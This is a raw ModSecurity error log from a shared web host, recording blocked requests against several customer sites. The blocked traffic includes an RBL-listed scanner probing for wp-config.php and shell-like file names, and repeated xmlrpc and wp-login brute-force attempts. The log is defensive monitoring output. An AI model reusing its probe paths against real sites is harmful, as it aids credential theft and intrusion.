[Tue May 26 12:46:42.367945 2026] [security2:error] [pid 448967:tid 449097] [client 4.201.75.230:5572] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/init.php"] [unique_id "ahVI2uXLPuWQsfM-UVSfRAAAAAA"]
[Tue May 26 12:46:42.382244 2026] [security2:error] [pid 448967:tid 449155] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVI2eXLPuWQsfM-UVSfOwAAADo"]
[Tue May 26 12:46:44.448696 2026] [security2:error] [pid 448967:tid 449207] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVI3OXLPuWQsfM-UVSfaQAAAG4"]
[Tue May 26 12:46:44.798781 2026] [security2:error] [pid 448967:tid 449131] [client 157.20.138.61:60676] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVI3OXLPuWQsfM-UVSffAAAACI"]
[Tue May 26 12:46:44.798975 2026] [security2:error] [pid 448967:tid 449131] [client 157.20.138.61:60676] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVI3OXLPuWQsfM-UVSffAAAACI"]
[Tue May 26 12:46:45.009958 2026] [security2:error] [pid 448967:tid 449218] [client 185.191.171.7:62608] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahVI3eXLPuWQsfM-UVSfgwAAAHk"]
[Tue May 26 12:46:45.010111 2026] [security2:error] [pid 448967:tid 449218] [client 185.191.171.7:62608] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahVI3eXLPuWQsfM-UVSfgwAAAHk"]
[Tue May 26 12:46:45.235447 2026] [security2:error] [pid 448967:tid 449160] [client 4.201.75.230:5522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/login.php"] [unique_id "ahVI3eXLPuWQsfM-UVSfiAAAAD8"]
[Tue May 26 12:46:47.052548 2026] [security2:error] [pid 448967:tid 449156] [client 4.201.75.230:5528] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/main.php"] [unique_id "ahVI3-XLPuWQsfM-UVSfsgAAADs"]
[Tue May 26 12:46:47.324297 2026] [security2:error] [pid 448967:tid 449202] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVI3uXLPuWQsfM-UVSfrgAAAGk"]
[Tue May 26 12:46:49.523221 2026] [security2:error] [pid 448967:tid 449104] [client 49.147.44.157:52905] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "xllent.in"] [uri "/index.php"] [unique_id "ahVI4OXLPuWQsfM-UVSf3gAAAAc"]
[Tue May 26 12:46:49.671442 2026] [security2:error] [pid 448967:tid 449121] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVI4eXLPuWQsfM-UVSf6gAAABg"]
[Tue May 26 12:46:51.037633 2026] [security2:error] [pid 448967:tid 449127] [client 4.201.75.230:5318] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/settings.php"] [unique_id "ahVI4-XLPuWQsfM-UVSgFAAAAB4"]
[Tue May 26 12:46:51.088007 2026] [security2:error] [pid 448967:tid 449056] [remote 123.30.233.13:51766] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahVI4uXLPuWQsfM-UVSgEgAARFg"]
[Tue May 26 12:46:52.639183 2026] [security2:error] [pid 448967:tid 449207] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVI5OXLPuWQsfM-UVSgNAAAAG4"]
[Tue May 26 12:46:53.747332 2026] [security2:error] [pid 448967:tid 449110] [client 91.117.177.142:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVI5eXLPuWQsfM-UVSgYAAAAA0"], referer: https://www.anujtradingco.com/
[Tue May 26 12:46:54.760394 2026] [security2:error] [pid 448967:tid 449182] [client 91.117.177.142:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVI5uXLPuWQsfM-UVSggQAAAFU"], referer: https://www.anujtradingco.com/blog-2/blog-boxed-bigtext/?unapproved=1186526&moderation-hash=dd6fb4b9da4a13d304b4106fad919de7
[Tue May 26 12:46:55.465124 2026] [security2:error] [pid 448967:tid 449165] [client 157.20.138.61:61021] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVI5-XLPuWQsfM-UVSgiwAAAEQ"]
[Tue May 26 12:46:55.465273 2026] [security2:error] [pid 448967:tid 449165] [client 157.20.138.61:61021] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVI5-XLPuWQsfM-UVSgiwAAAEQ"]
[Tue May 26 12:46:56.075062 2026] [security2:error] [pid 448967:tid 449192] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVI5-XLPuWQsfM-UVSgoQAAAF8"]
[Tue May 26 12:46:58.761855 2026] [security2:error] [pid 448967:tid 448969] [remote 45.79.189.31:49652] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.189.79.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahVI6uXLPuWQsfM-UVSg6gAAQQE"]
[Tue May 26 12:46:59.437720 2026] [autoindex:error] [pid 448967:tid 449180] [client 198.235.24.93:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/test/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 12:46:59.622898 2026] [security2:error] [pid 448967:tid 449197] [client 146.174.164.113:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVI6-XLPuWQsfM-UVShBgAAAGQ"]
[Tue May 26 12:46:59.734719 2026] [security2:error] [pid 448967:tid 449194] [client 165.140.119.146:49722] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 146.119.140.165.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVI6-XLPuWQsfM-UVShFwAAAGE"], referer: https://www.bloggertarget.com
[Tue May 26 12:46:59.734912 2026] [security2:error] [pid 448967:tid 449194] [client 165.140.119.146:49722] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVI6-XLPuWQsfM-UVShFwAAAGE"], referer: https://www.bloggertarget.com
[Tue May 26 12:46:59.971241 2026] [security2:error] [pid 448967:tid 449150] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVI6-XLPuWQsfM-UVShEwAAADU"]
[Tue May 26 12:47:00.007657 2026] [security2:error] [pid 448967:tid 449110] [client 104.206.32.83:54639] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVI6-XLPuWQsfM-UVShCgAAAA0"], referer: https://anujtradingco.com
[Tue May 26 12:47:01.847909 2026] [security2:error] [pid 448967:tid 449177] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVI7eXLPuWQsfM-UVShSQAAAFA"]
[Tue May 26 12:47:01.891220 2026] [security2:error] [pid 448967:tid 449198] [client 4.201.75.230:5525] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-activate.php"] [unique_id "ahVI7eXLPuWQsfM-UVShXwAAAGU"]
[Tue May 26 12:47:02.634739 2026] [security2:error] [pid 448967:tid 449155] [client 64.233.173.148:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVI7uXLPuWQsfM-UVShcAAAADo"]
[Tue May 26 12:47:03.000389 2026] [security2:error] [pid 448967:tid 449182] [client 4.201.75.230:5545] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-blog-header.php"] [unique_id "ahVI7uXLPuWQsfM-UVShfQAAAFU"]
[Tue May 26 12:47:04.507218 2026] [security2:error] [pid 448967:tid 449199] [client 4.201.75.230:5508] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-comments-post.php"] [unique_id "ahVI8OXLPuWQsfM-UVShqgAAAGY"]
[Tue May 26 12:47:04.727992 2026] [security2:error] [pid 448967:tid 449134] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVI8OXLPuWQsfM-UVShpAAAACU"]
[Tue May 26 12:47:05.575155 2026] [security2:error] [pid 448967:tid 449104] [client 4.201.75.230:5330] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-conffq.php"] [unique_id "ahVI8eXLPuWQsfM-UVShywAAAAc"]
[Tue May 26 12:47:05.807327 2026] [security2:error] [pid 448967:tid 449193] [client 157.20.138.61:61369] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVI8eXLPuWQsfM-UVShzwAAAGA"]
[Tue May 26 12:47:05.807408 2026] [security2:error] [pid 448967:tid 449193] [client 157.20.138.61:61369] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVI8eXLPuWQsfM-UVShzwAAAGA"]
[Tue May 26 12:47:07.005513 2026] [security2:error] [pid 448967:tid 449215] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVI8uXLPuWQsfM-UVSh5gAAAHY"]
[Tue May 26 12:47:10.475357 2026] [security2:error] [pid 448967:tid 449143] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVI9uXLPuWQsfM-UVSiRQAAAC4"]
[Tue May 26 12:47:13.616099 2026] [security2:error] [pid 448967:tid 449114] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVI-eXLPuWQsfM-UVSikwAAABE"]
[Tue May 26 12:47:15.060573 2026] [security2:error] [pid 448967:tid 449156] [client 4.201.75.230:5511] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-config-sample.php"] [unique_id "ahVI--XLPuWQsfM-UVSizAAAADs"]
[Tue May 26 12:47:16.425428 2026] [security2:error] [pid 448967:tid 449178] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVI--XLPuWQsfM-UVSi6QAAAFE"]
[Tue May 26 12:47:16.426760 2026] [security2:error] [pid 448967:tid 449205] [client 157.20.138.61:61722] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVI_OXLPuWQsfM-UVSi8QAAAGw"]
[Tue May 26 12:47:16.426898 2026] [security2:error] [pid 448967:tid 449205] [client 157.20.138.61:61722] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVI_OXLPuWQsfM-UVSi8QAAAGw"]
[Tue May 26 12:47:17.418700 2026] [security2:error] [pid 448967:tid 449138] [client 4.201.75.230:6085] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-config.php"] [unique_id "ahVI_eXLPuWQsfM-UVSjFAAAACk"]
[Tue May 26 12:47:18.671834 2026] [security2:error] [pid 448967:tid 449164] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVI_uXLPuWQsfM-UVSjJQAAAEM"]
[Tue May 26 12:47:21.631839 2026] [security2:error] [pid 448967:tid 449102] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJAeXLPuWQsfM-UVSjgQAAAAU"]
[Tue May 26 12:47:21.965634 2026] [security2:error] [pid 448967:tid 449222] [client 4.201.75.230:5340] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-cron.php"] [unique_id "ahVJAeXLPuWQsfM-UVSjlwAAAH0"]
[Tue May 26 12:47:25.046793 2026] [security2:error] [pid 448967:tid 449212] [client 49.43.156.237:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVJBOXLPuWQsfM-UVSj8gAAAHM"], referer: https://www.google.com/
[Tue May 26 12:47:25.210200 2026] [security2:error] [pid 448967:tid 449114] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJBOXLPuWQsfM-UVSj6gAAABE"]
[Tue May 26 12:47:27.199246 2026] [security2:error] [pid 448967:tid 449163] [client 157.20.138.61:62077] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJB-XLPuWQsfM-UVSkQwAAAEI"]
[Tue May 26 12:47:27.199426 2026] [security2:error] [pid 448967:tid 449163] [client 157.20.138.61:62077] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJB-XLPuWQsfM-UVSkQwAAAEI"]
[Tue May 26 12:47:28.050234 2026] [security2:error] [pid 448967:tid 449135] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJB-XLPuWQsfM-UVSkWgAAACY"]
[Tue May 26 12:47:28.116918 2026] [security2:error] [pid 448967:tid 449199] [client 213.230.87.242:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJB-XLPuWQsfM-UVSkYQAAAGY"]
[Tue May 26 12:47:29.383286 2026] [security2:error] [pid 448967:tid 449124] [client 4.201.75.230:5338] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-headre.php"] [unique_id "ahVJCeXLPuWQsfM-UVSkqQAAABs"]
[Tue May 26 12:47:30.937755 2026] [security2:error] [pid 448967:tid 449107] [client 4.201.75.230:6112] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-links-opml.php"] [unique_id "ahVJCuXLPuWQsfM-UVSk_wAAAAo"]
[Tue May 26 12:47:31.083510 2026] [security2:error] [pid 448967:tid 449114] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJCuXLPuWQsfM-UVSk8wAAABE"]
[Tue May 26 12:47:32.256344 2026] [security2:error] [pid 448967:tid 449198] [client 4.201.75.230:6133] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-load.php"] [unique_id "ahVJDOXLPuWQsfM-UVSlEQAAAGU"]
[Tue May 26 12:47:33.698739 2026] [security2:error] [pid 448967:tid 449128] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJDeXLPuWQsfM-UVSlKgAAAB8"]
[Tue May 26 12:47:36.846248 2026] [security2:error] [pid 448967:tid 449184] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJEOXLPuWQsfM-UVSlcAAAAFc"]
[Tue May 26 12:47:37.074387 2026] [security2:error] [pid 448967:tid 449001] [remote 163.223.13.54:53202] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 54.13.223.163.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVJEOXLPuWQsfM-UVSlfQAACiE"]
[Tue May 26 12:47:37.107372 2026] [security2:error] [pid 448967:tid 448999] [remote 45.250.255.226:48472] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.255.250.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVJEOXLPuWQsfM-UVSlfgAANx8"]
[Tue May 26 12:47:37.800167 2026] [security2:error] [pid 448967:tid 449113] [client 157.20.138.61:62433] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJEeXLPuWQsfM-UVSllQAAABA"]
[Tue May 26 12:47:37.800292 2026] [security2:error] [pid 448967:tid 449113] [client 157.20.138.61:62433] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJEeXLPuWQsfM-UVSllQAAABA"]
